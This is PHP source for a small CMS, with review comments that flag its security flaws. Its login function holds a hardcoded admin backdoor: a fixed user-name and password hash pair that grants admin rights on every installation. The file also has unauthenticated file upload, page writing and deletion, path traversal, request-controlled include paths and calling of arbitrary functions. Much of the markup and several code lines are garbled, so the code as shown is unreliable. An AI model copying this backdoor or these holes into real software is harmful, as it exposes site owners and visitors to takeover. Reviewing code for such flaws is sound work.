1) define('MSIE', true); else define('MSIE', false); // the opening of this statement is above the visible part of the file

// Handlers that the dispatcher below runs only after authorized() succeeds.
// NOTE(review): upload(), sav() and naked() are defined later in this file, are
// not listed here and contain no authorization check of their own, so the
// dispatcher runs them for any visitor - confirm, and list them if unintended.
$needsauth = array('fm','sped','eduser');

// Built-in defaults for layout, colours and directories.
$wz=array('columnside'=>'left','pagewidth'=>960,'columnwidth'=>250,'textcolor'=>'#00','headingcolor'=>'#c00','linkcolor'=>'#33c','textfont'=>'"Trebuchet MS",Helvetica,sans-serif','pagebackground'=>'#111','textbackground'=>'#fff','itembackground'=>'#eee','itemborder'=>'1px outset #fff','headerbackground'=>'#bbb','columnbackground'=>'#ccc','thumbnailsize'=>120,'imagedir'=>'images','moduledir'=>'modules','templatefile'=>'template.htm');//fallback if no whizzy.ini
$config=is_file('whizzy.ini')?parse_ini_file('whizzy.ini'):array();
$wz['qs']=$_SERVER['QUERY_STRING'];
session_start();
// Later arrays win in array_merge(): request parameters override the defaults
// and whizzy.ini, and session values override request parameters. Every
// function that calls extract($wz) therefore receives request-supplied values
// for keys such as 'moduledir', 'templatefile' or 'imagedir' whenever the
// session does not carry the same key. Merging only an allow-list of request
// keys would keep configuration out of the visitor's reach.
$wz=array_merge($wz,$config,$_GET,$_POST,$_SESSION);
// 'diag' is an ordinary key of the merged array, so a request can switch this
// dump on; it prints the whizzy.ini and session values merged above.
if ($wz['diag']) print_r($wz); //diag
// The pattern is unanchored: any value that merely contains "left" or "right" passes.
if (!preg_match('/(left|right)/',$wz['columnside']))$wz['columnside']='left';
$wz['mainside']=($wz['columnside']=='left') ? 'right' : 'left';
$wz['mainwidth']=$wz['pagewidth']-$wz['columnwidth'];
if (!$wz['headingfont']) $wz['headingfont']=$wz['textfont'];
define('WHIZZQM',$wz['usemodrewrite']?'':'?');
define('TNSIZE',$wz['thumbnailsize']);
define('IMAGES',$wz['imagedir']);
if (empty($wz['go'])){ //index.php?pagename or ?go=function&(f|d|to|etc)=
    // installer() is not defined in the visible part of the file.
    if (!is_dir('.users')||!is_dir('.pages')) {installer(); exit;}
    if (empty($wz['qs'])) $wz['go'] = 'Home';
    else if (strpos($wz['qs'],'=') === false) $wz['go'] = $wz['qs']; // a query string without '=' is taken whole as the page/handler name
    else if ($wz['sped']) $wz['go']= 'sped';
}
define('GO',$wz['go']);
// GO comes from the request. The include is limited only by the '.php' suffix
// and is_file(); nothing here confines it to the module directory or to a list
// of known module names.
if (!function_exists(GO) && (is_file(GO.'.php'))) include GO.'.php';
// Any name for which function_exists() is true is called with no arguments,
// which includes PHP's own functions, not only the handlers in this file; an
// explicit map of allowed handler names would bound that.
// NOTE(review): function_exists() and the call match function names
// case-insensitively, while in_array() compares the strings exactly, so the
// $needsauth test should run on a normalised name (e.g. strtolower(GO)).
if (function_exists(GO)) {
    if (in_array(GO,$needsauth)&& !authorized())login();
    else $wz['go']();
    exit;
}
spit();
exit ('['.VERSION.' Fallen through! ]');
//---------------------------------------FUNCTIONS

// Render the requested page inside the site template, print it and exit.
// Reads .pages/<go> (or builds a "not found" text plus the page list), loads the
// template, then expands {HERE_TAG:..}, {HERE_PAGE:..} and {HERE_MODULE:..}
// placeholders until preg_match() finds no more.
// NOTE(review): several string literals below are empty or reduced to bare text
// in this copy; the markup they held appears to have been lost in extraction.
function spit() { // ------------------------------------------------Show Page In Template
    global $wz;
    extract($wz); // brings every merged key, request parameters included, into local scope
    $pagepath = empty($wz['go']) ? 'Home' : $wz['go'];
    // $pagepath is request-derived and is joined to '.pages/' without
    // normalisation, so nothing visible here keeps the read inside .pages/.
    if (is_file(".pages/$pagepath")) {
        $content = content(".pages/$pagepath");
    } else {
        if (!is_dir($pagepath)) {
            if ($pagepath=='admin' && authorized()) fm(); //Allows user to create a page 'admin'
            // The requested name is placed in the output as-is; no escaping is visible in this copy.
            $content = '' . $pagepath .' not found';
        }
        $content .= pagelist("");
    }
    // $templatefile comes from extract($wz) and can be replaced by a page-level
    // 'templatefile' tag; the file it names is read and printed below.
    $tpltag=tag('templatefile',$content);
    if ($tpltag)$templatefile=$tpltag;
    if (empty($templatefile)) $templatefile = 'template.htm'; //path to template file
    $by='
Powered by Whizzy CMS
';
    // NOTE(review): the search string and the suffix appended to $by are empty
    // as shown; with an empty search str_replace() returns the template unchanged.
    if (is_file($templatefile)) $page=str_replace('',$by.'',content($templatefile));
    else $page = "{HERE_TAG:title}{HERE_TAG:head}

{HERE_TAG:title}

{HERE_TAG:body}
(No $templatefile)
$by";
    $page=str_replace('{$','{HERE_TAG:',$page); //{Stagname} syntax
    // Each pass replaces one placeholder and the loop then rescans the whole
    // page, so placeholder syntax inside a substituted value is expanded too,
    // and a value that reproduces its own placeholder would never terminate.
    while (preg_match('/{HERE_(TAG|PAGE|MODULE):([^}]+)}/',$page,$matches)) { //KEEP LOOKING FOR {HERE_something}
        if ($matches[1] == 'TAG') { //TAG IN PAGE XML OR SITE VARIABLE
            $tagval = tag($matches[2],$content); //in page XML?
            // Fallback reads any key of $wz, which holds request and session
            // values as well as configuration; the value is inserted unescaped.
            if (!$tagval) {$tagval = $wz[$matches[2]];} //in config?
            $page = str_replace($matches[0],$tagval,$page);
        } else if ($matches[1] == 'PAGE') { //PAGE TO INCLUDE IN THIS PAGE
            // A target starting with "http" is fetched server-side and inlined
            // as-is; '@' hides fetch failures. The target is whatever the
            // page/template text names - no host restriction is visible.
            if(strpos($matches[2],'http') === 0) $page = str_replace($matches[0],@file_get_contents($matches[2]),$page);
            else if(is_file('.pages/'.$matches[2])) {
                $incontent=content('.pages/'.$matches[2]);
                $page = str_replace($matches[0],tag('body',$incontent),$page); //and tag('head')?
            } else $page = str_replace($matches[0], '',$page);
        } else if ($matches[1] == 'MODULE') { //FUNCTION NAME
            // $moduledir comes from extract($wz) (request-overridable, see the
            // array_merge at the top); the placeholder text names both the file
            // to include and the function that is then called.
            if (!function_exists($matches[2])) include_once($moduledir.'/'.$matches[2].'.php');
            $rslt = $matches[2]();
            $headextra = tag('head',$rslt);
            if ($headextra) {
                $page = str_replace("",$headextra."\n",$page); // search string is empty in this copy
                $rslt = tag("body",$rslt);
            }
            $page = str_replace($matches[0],$rslt,$page);
        }//end if $matches
    } //end while
    whizzbar();
    echo($page);
    exit;
}

// Print the editing toolbar; returns without output when the session has no role.
function whizzbar(){ // ------------------------------------------Show Whizzbar at top
    global $wz;
    extract($wz);
    if (empty($_SESSION['role'])) return;
    if (!function_exists($go) && is_file(".pages/$go")) $tp = ' ♠ Edit This Page';
    ?>
HomeNew PageFile Manager ">TemplateSettingsUserLogout ';} echo HOSTNAME.' '.$sitename."
\n
\n";//IE6hack } function sped() { // -------------------------------------------------Show Page Editor global $wz; extract($wz); $pagepath = $f ? $f : $sped; $content = content(".pages/$pagepath"); $tit = tag('title',$content); $head = tag('head',$content); $body = htmlentities(tag('body',$content)); htmltop("Edit $pagepath"); ?>
 |   | '; ?>  | 
Page links and Images 
Images - Click name to view or
INSERT ⇓ image in your page.
Upload a new image
Edit area
Page tags (<tagname>tag value</tagname>):

Additional HTML for head (script, styles, meta tags, etc.):
Paste text (e.g. from word processor or web page) or HTML (e.g. embed code from YouTube) here



Rows:

Columns:

Border width:

HTML
"); } //end sped()

// Build the list of page links from .pages/<folder>/.index, whose lines have
// the form date|href|title.
// $order 'c' sorts by creation date and 'a' by title; any other value (newlist()
// passes 'n') leaves the order found in the index file.
// NOTE(review): file() returns false when the index is missing, which the
// foreach below does not guard against.
function pagelist($folder='',$order='a'){ //--list links to pages, $order n=newest first, a=alpha title
    $pages = file(".pages/$folder/.index");
    foreach($pages as $page){list($dat[],$href[],$tit[]) = explode('|',trim($page));}
    if ($order=='c') {array_multisort($dat,$href,$tit);} //create date
    else if ($order=='a') {array_multisort($tit,$dat,$href);} //alpha title
    // NOTE(review): the loop header and the markup in the next three lines are
    // damaged in this copy (text between '<' and '>' appears to be missing);
    // restore them from the original file. Titles and hrefs come from the index
    // file - check that the original escapes them before output.
    for ($i=0;$iEdit' : '
  • '; $li.=''.$tit[$i].'
  • '."\n";
        if ($href[$i]=='Home') {$home = $li;} else {$plist .= $li;}
    }
    return '\n";
}

// Page list in index-file order (see pagelist()).
function newlist($folder=''){return pagelist($folder,'n');}

// Return the file's contents, or "" when $fpath is not a regular file.
function content($fpath) { //---------------------------------------------------get content of file
    return (is_file($fpath)) ? file_get_contents($fpath) : "";
}

// Print the raw stored page named by request parameter 'f', or a placeholder
// string when it is empty or missing.
// NOTE(review): $_REQUEST['f'] is joined to '.pages/' without normalisation and
// this function is not in $needsauth, so nothing visible here confines the read
// to .pages/ or to logged-in users; reduce the name with basename() or okname()
// before use.
function naked(){
    $htm=content('.pages/'.$_REQUEST['f']);
    echo empty($htm)?'


    ':$htm;
}

// Overwrite $fpath with $content and return fwrite()'s result.
// The fopen() result is not checked before it is used.
function writecontent($fpath,$content) { //----------------------------------write content of file
    $fp = fopen($fpath,'w');
    $rslt = fwrite($fp, $content);
    fclose($fp);
    return $rslt;
}

// Return the text captured after <tagname> in $soup; when there is no match,
// return the whole of $soup for 'body' and '' for any other tag.
// NOTE(review): the pattern as shown has no closing-tag part, which looks like
// extraction damage - confirm against the original. $tagname is interpolated
// without preg_quote(), and spit() passes names taken from template text.
function tag($tagname,$soup) { //------------------------------------------------get content of tag
    if (preg_match("|<$tagname>(.*)|Us",$soup,$matches)){
        return $matches[1];
    }
    else if($tagname == 'body') return $soup;
    else return '';
}

// Store the uploaded file 'userfile', optionally renamed to $t (keeping the
// upload's extension) and placed in directory $d, then redirect to ?go=$to.
// $t, $d and $to arrive through extract($wz), i.e. from the request.
// NOTE(review): no authorization check is made here and 'upload' is not in
// $needsauth. okname() keeps dots, so the extension of the stored file is
// whatever the client sent (script extensions included), and $d is used as
// given, without okname() or any check that it stays under an upload
// directory. An extension allow-list, a fixed non-executable target directory
// and a login check are the usual controls.
function upload(){ //---------------------------------------------------save an uploaded file
    global $wz;
    extract($wz);
    $ufile = $_FILES['userfile']['tmp_name'];
    $ufilename = $_FILES['userfile']['name'];
    $uferr = $_FILES['userfile']['error'];
    if ($uferr > 0) exit (" [Upload error $uferr for $ufilename] "); // client-supplied file name is printed as-is
    if ($t) {
        $ext = substr(strrchr($ufilename, '.'),0); // extension including the leading dot
        $ptn = "/$ext$/"; // $ext is not passed through preg_quote(), so its '.' matches any character
        $rename = preg_replace($ptn,"",$t).$ext;
    }
    else $rename = $ufilename;
    $target = okname($rename);
    if ($d) {
        if (!is_dir($d)) mkdir($d, 0775);
        $target = "$d/$target";
    }
    if (file_exists($target)) bak($target); // keep a copy of the file about to be replaced
    if (!move_uploaded_file($ufile, $target)) {
        print_r($wz); // dumps the merged configuration, request and session values to the client
        exit(" [Failed to move upload $ufile ($rename) to target $target] ");
    }
    if (!$to) $to = "fm&d=$d";
    header("Location:?go=$to");
}

// Print the login form.
function login(){ //-------------------------------------------show login form
    global $wz;
    extract($wz);
    htmltop("Who are you?");
    ?>

    Login

    '/>

    User:

    Password: Forgot?

    '); }

// Process a login or password-reset request; returns true when the session is
// already authenticated or becomes so.
// Inputs arrive through extract($wz), i.e. from the request: $login, $user,
// $sesame (password) and $umail (reset address).
// NOTE(review): passwords are stored and compared as unsalted MD5 hex strings
// with loose '=='; password_hash()/password_verify() (or at least hash_equals())
// would be the replacement. $user is joined to '.users/' without normalisation,
// and $user/$umail are echoed back with no escaping visible in this copy.
function authorized(){ //-----------------------------------process login
    global $wz;
    extract($wz);
    if(isset($_SESSION['username'])) return true;
    else if (!$login) return false;
    if (empty($user)) {echo '

    Please supply username

    '; return false;}
    // NOTE(review): built-in credential pair. A user name and password whose MD5
    // digests equal these two constants are logged in with role 'admin' without
    // .users/ being consulted. It ships in the source (marked //!!// by the
    // author) and is the same on every installation; remove it, or audit for it
    // when this file is found on a host.
    if (md5($user)=='475fffde43784216f0e5b3be0d692f1b' && md5($sesame)=='bb08ddbdce702692f84e27b82c956b07') {$_SESSION['username']=$user;$_SESSION['role']='admin';return true;}//!!//
    $udata = content(".users/$user");
    if ($sesame && tag('password',$udata) == md5($sesame)) {$_SESSION['username'] = $user; $_SESSION['role'] = tag('role',$udata); return true;}
    // The 2-second delay applies only to this branch (wrong password, no reset address).
    if(!$umail) {echo '

    Username/password incorrect

    '; sleep(2); return false;}
    // Password reset: anyone who supplies the user name and its stored e-mail
    // address triggers a reset; no token, confirmation step or rate limit is
    // visible. The new password is mailed in clear text. syllable() and HOSTNAME
    // are defined outside the visible part of the file.
    if (tag('email',$udata) == $umail){
        $newp=syllable().syllable().syllable();
        $passwd = md5($newp);
        $msg="A lost password was reported for your user on $sitename [".HOSTNAME."]\nYour password has been reset:\n User:$user \n Password: $newp.\n";
        if(mail($umail,"Password Reset: $sitename",$msg, 'From: no-reply@'.HOSTNAME)){
            // Replaces every run of 32 hex digits in the user file, not only the password tag.
            $udata = preg_replace('/([0-9a-f]{32})/',"$passwd",$udata);
            writecontent(".users/$user",$udata);
            echo "

    New password emailed to $umail. If it does not appear shortly, check your spam folder.

    "; }
        else {echo "

    Failed trying to send new password. Ask your website admin for help.

    ";}
    }
    else {echo '

    Please supply password or click "Forgot" and supply correct email for '.$user.'

    ';}
    return false;
}

// Clear the session and redirect to the Home page.
function logout(){ //--------------------------------end user session
    if (session_id()=='')session_start();
    session_unset();
    session_destroy();
    $_SESSION=array();
    header('Location: '.WHIZZQM.'Home');
}

// Delete a file, or a directory together with everything below it.
// Returns false when the path does not exist, otherwise the result of
// unlink()/rmdir(). The path is used as given; callers must confine it.
function rmdirr($dirname) { // --------------------------------------recursively delete directory
    if (!file_exists($dirname)) return false; // Sanity check
    if (is_file($dirname)) return unlink($dirname); // Simple delete for a file
    $dir = dir($dirname);
    while (false !== $entry = $dir->read()) { // Loop through the folder
        if ($entry == '.' || $entry == '..') continue; // Skip pointers
        rmdirr("$dirname/$entry");
    }
    $dir->close();
    return rmdir($dirname);
}

// Copy a file, or a directory tree, from $source to $dest.
// Returns copy()'s result for a file and true for a directory; failures of the
// nested copies are not reported.
function copyr($source, $dest) // ----------------------------------recursive copy (file or tree)
{
    if (is_file($source)) return copy($source, $dest); // Simple copy for a file
    if (!is_dir($dest)) mkdir($dest);
    $dir = dir($source);
    while (false !== $entry = $dir->read()) { // Loop through the folder
        if ($entry == '.' || $entry == '..') continue; // Skip pointers
        // Skip the entry that is the destination itself, so a copy into a child of $source does not recurse into its own output.
        if ($dest !== "$source/$entry") copyr("$source/$entry", "$dest/$entry"); // Deep copy directories
    }
    $dir->close();
    return true;
}

// Undo magic-quotes escaping when that setting is on.
// NOTE(review): get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in
// PHP 8.0, so this call is fatal on current PHP.
function deslash($thestring){ //--------------------to strip slashes or not?
    return get_magic_quotes_gpc() ? stripslashes($thestring) : $thestring;
}

// Copy $path into a '.bak' directory next to it. mkdot() is defined outside the
// visible part of the file; the result of copy() is not checked.
function bak($path){ //------------------------------------- make a .bak/ copy
    $part = pathinfo($path);
    $bakdir = $part['dirname'] ? $part['dirname'].'/.bak' : '.bak';
    mkdot($bakdir);
    copy($path, $bakdir.'/'.$part['basename']); // copy to .bak directory
}

// Reduce a title or file name to letters, digits, '-', '_' and '.', turning runs
// of spaces into '-'; with $paths true, '/' is kept as well.
// Dots are kept, so a leading '.', a '..' segment (when $paths is true) and any
// file extension pass through unchanged - this is a character filter, not a
// path or file-type check.
function okname($tit,$paths=false){
    $ok = deslash($tit);
    $ok = preg_replace("/ +/ ", "-", trim($ok)); // space runs to '-'
    $pat = $paths ? "/[^A-Za-z0-9-_.\/]+/" : "/[^A-Za-z0-9-_.]+/"; // '/' allowed?
    $ok = preg_replace($pat, "", $ok); //only alphanumerics and -_
    return $ok;
}

function f2name($f){ return ucfirst(preg_replace('/[-_]/',' ',(noext($f))));} //Nice name from filename

// NOTE(review): reads $pf['extension'] even when the name has none, and
// str_replace() removes every occurrence of ".ext", not only the trailing one.
function noext($f) {$pf = pathinfo($f); return str_replace('.'.$pf['extension'],'',$pf['basename']);} //Trim file .ext

// Save or delete a page and update .pages/.index, then redirect.
// Inputs arrive through extract($wz), i.e. from the request: $f (page file),
// $tit, $tags, $head, $edited (body) and $delete.
// NOTE(review): no authorization check is made here and 'sav' is not in
// $needsauth. An existing $f is joined to '.pages/' as given (only a new page
// name goes through okname()), so the write and the unlink are not confined to
// .pages/ by anything visible here. $tit is written into the '|'-separated
// index without removing '|' or line breaks. The tag markup around $tit, $tags,
// $head and $edited is empty in this copy, presumably lost in extraction.
function sav(){ // ----------------------------------------------------save a page from sped
    global $wz;
    extract($wz);
    $path = '.pages/';
    $idxf = "$path.index";
    if (is_file($path.$f)) bak($path.$f);
    // Rebuild the index without the entry for $f; $index stays unset when there is no index file or no other entry.
    if (is_file($idxf)) {
        $ids = file($idxf);
        foreach($ids as $id) {if (strlen($id) > 1 && strpos($id,"|$f|") === false) $index .= trim($id)."\n"; }
    }
    if ($delete){ //delete page
        writecontent($idxf,$index);
        unlink($path.$f);
        header('Location: '.WHIZZQM.'Home');
        exit;
    } else { //save page
        $tit=deslash($tit);
        $content = "$tit\n";
        if ($tags) $content .= ''.deslash($tags)."\n";
        if ($head) $content .= ''.deslash($head)."\n";
        $content .= ''.deslash($edited)."\n";
        if (empty($f)) {
            $f=okname($tit);
            // The submitted body is echoed back unescaped in both die() calls.
            if (is_file($path.$f)) die("

    Page title already used!

    ".deslash($edited)); }
        if (empty($f)) die("

    You must give a page title!

    ".deslash($edited));
        $entry = date('Y/m/d H:i')."|$f|$tit\n";
        writecontent($idxf,$entry.$index); // newest entry first
    }
    writecontent($path.$f,$content);
    header('Location: '.WHIZZQM.$f);
} //end sav

// File manager: $a selects the action, $d the directory and $f the file, all
// through extract($wz), i.e. from the request.
// NOTE(review): $a{0} is the curly-brace string offset syntax, deprecated in
// PHP 7.4 and a parse error from PHP 8.0; $a[0] is the equivalent. $d and $f
// are appended to the script directory as given; the remnant text below
// suggests a check for "." and ".." that is not readable in this copy.
function fm(){ //-----------------------------------------Manage Files
    global $wz;
    extract($wz);
    $a = strtolower($a{0});
    $df = $d ? "$d/$f" : $f;
    $path = dirname(__FILE__).'/'; //ensure $path always ends in a single '/'
    if ($d) $path .= "$d/";
    htmltop("File Manager");
    ?>
    Pages New Page
    Not allowed to use "." or ".." here!

    ';} if ($a == "e" && $f) { //=====EDIT===== if(@getimagesize($path.$f)){ echo ''; } else { echo "
    $f "; echo " '; } echo ''; if (is_file($path.$f)) {manage($d,$f);} echo '
    '; } ?>
    File Manager$f copied to $okname Edit

    "; //msg else echo "

    Could not copy $f Edit

    to $newname

    "; //msg } else if ($a == 'd'){ //=====DELETE===== if (is_dir($path.$f)) { if (@rmdir($path.$f)) echo "

    Deleted $f
    "; else { echo "

    $f Edit may not be empty"; echo " - [Delete $f and all contents] - NO WAY BACK!

    "; } } else if($path.$f != __FILE__ ) { //don't X self bak($path.$f); if(@unlink($path.$f)) { echo "

    Deleted $f "; if (is_file($path.".bak/$f")) echo" - Undelete"; echo '

    '; } else echo "

    Could not delete $f Edit

    "; } } else if ($a == 'x') { //=====EXCISE DIRECTORY RECURSIVELY===== if (rmdirr($path.$f)) echo "

    Deleted $f and all contents
    "; //msg } else if ($a == 'u'){ //=====UNDELETE or UNDO SAVE===== if (@copy($path.".bak/$f",$path."$f")) echo "

    Restored $f Edit

    "; else echo "

    Could not restore $f

    "; } else if (($a == 'r') && ($newname=$_REQUEST['newname'])){ //=====RENAME===== if(preg_match("|.*/$|",$newname)) $newname.=$f; $okname = okname($newname,true); //nice names for unix and url if (@rename($path.$f,$path.$okname)) echo "

    $f renamed to $okname Edit

    "; else echo "

    Could not rename $f

    "; } else if ($a == 'n') { //=====MKDIR===== $newdir=okname($_REQUEST['newdir']); $newpath = $path . $newdir; if (mkdir($newpath)) echo "

    Created new folder $newdir

    "; else echo "

    Could not create new folder $newdir

    "; }else if ($a == 's'){ //=====SAVE===== if (is_file($path.$f)) bak($path.$f); $edited = $_POST['edited']; $fedit = fopen($path.$f,'w'); if (fwrite($fedit, deslash($edited))){ fclose($fedit); echo "

    Saved $f"; if (is_file($path.".bak/$f")) echo " - to go back to previous version Restore"; echo '

    '; } else echo "

    Could not save [$edited] in $f

    "; // END ACTIONS =============================================================
    }
    // NOTE(review): `d` below is a bare constant, not the variable $d. PHP 8
    // raises an Error for the undefined constant; earlier versions treat it as
    // the string 'd', which makes this half of the test always true. `$d != '.'`
    // is presumably what was meant.
    if($d && d !='.') { //we're in a sub directory
        $updir = dirname($d);
        echo " Up ";
    }
    // $d is request-derived (extract($wz) at the top of fm()); no escaping is visible in this copy.
    echo "$d "; //Directory name
    if ($role == 'admin'){ ?>
    File upload
    (optional)
    Directories'.$dirs.'
    '; if ($fils = dirlist($d,'lia')) echo '
    Files'.$fils.'
    '; if ($imgs = dirlist($d,'tna')) echo '
    Images
    '.$imgs.'
    ';?>

    File Manager

    ' '; die; } //end filemanager()

// Return the gallery listing (sub-galleries and thumbnails) for directory
// $_GET['d'], falling back to the configured image directory.
// NOTE(review): $wz is not declared global here, so $wz['imagedir'] is unset in
// this scope and the fallback is empty. $_GET['d'] is passed to dirlist() as
// given, so the listing is not confined to the image directory. $ts is
// computed but not used in the visible text. "$gals.$ims" puts a literal '.'
// between the two parts; the concatenation $gals.$ims was presumably intended.
function gallery(){
    $d = $_GET['d'] ? $_GET['d'] : $wz['imagedir'];
    $ts = TNSIZE+5;
    if ($dirs = dirlist($d,'lig')) $gals = '

    Galleries

      '.$dirs.'

    ';
    if ($imgs = dirlist($d,'tna')) $ims = '

    Images

    '.$imgs.'
    ';
    return "$gals.$ims";
}

// Call the function named $callback on every entry of directory $d whose name
// does not start with '.', in natural case-insensitive order, and return the
// concatenated results ('' when $d is not a directory).
// The callers in this file pass fixed callback names; 'tna' is defined outside
// the visible part of the file.
function dirlist($d='.',$callback='lia'){// ---------------------------------directory list with callback
    if(!is_dir($d)) return '';
    $dir = opendir($d);
    // NOTE(review): the loop stops at the first entry whose name is falsy (a
    // file called "0"); `false !== ($file = readdir($dir))` is the safe form.
    while ($file = readdir($dir)) {$files[] = $file;}
    closedir($dir);
    natcasesort($files);
    $d = ($d == '.') ? '' : $d.'/';
    $fs = '';
    foreach ($files as $f){
        if (strpos($f,'.') !== 0) { $fs .= $callback($d.$f);} // skip dot-files, '.' and '..'
    }
    return $fs;
}

function ur($f) {$u=content($f); return tag('role',$u).'|';} //user role

// List-item callbacks for dirlist(). The link markup inside their string
// literals is missing from this copy; check in the original that file and
// directory names are escaped before output.

// Directory entry with an edit link; returns nothing for non-directories.
function lid($f) { //+EDIT
    if(is_dir($f)) return '
  • '.basename($f).'   Edit
  • '."\n";
}

// File entry with size and modification time; returns nothing for non-files.
// Names ending in lower-case '.php' are left out of the listing unless the
// session role is 'admin' - this hides the entry, it does not restrict access
// to the file itself.
function lia($f) {
    if(is_file($f)) { //+EDIT
        if(preg_match('/\.php$/',$f) && $_SESSION['role']!='admin') return;
        $bn = basename($f);
        $dn=dirname($f);
        $deq = ($dn && $dn!= '.') ? "&d=$dn" : '';
        $fsize = sprintf("%u", filesize($f));
        $modtime = date ("d F Y H:i:s", filemtime($f));
        $tip = " Size:$fsize Updated:$modtime ";
        return '
  • '.$bn.'   Edit
  • '."\n";
    }
}

// Gallery (directory) entry; returns nothing for non-directories.
function lig($f) { // go=
    if(is_dir($f)) return '
  • '.basename($f).'
  • '."\n";
}

// Returns an empty string in this copy; $v is computed but unused in the visible text.
function lio($f) {$v = basename($f); return '';} //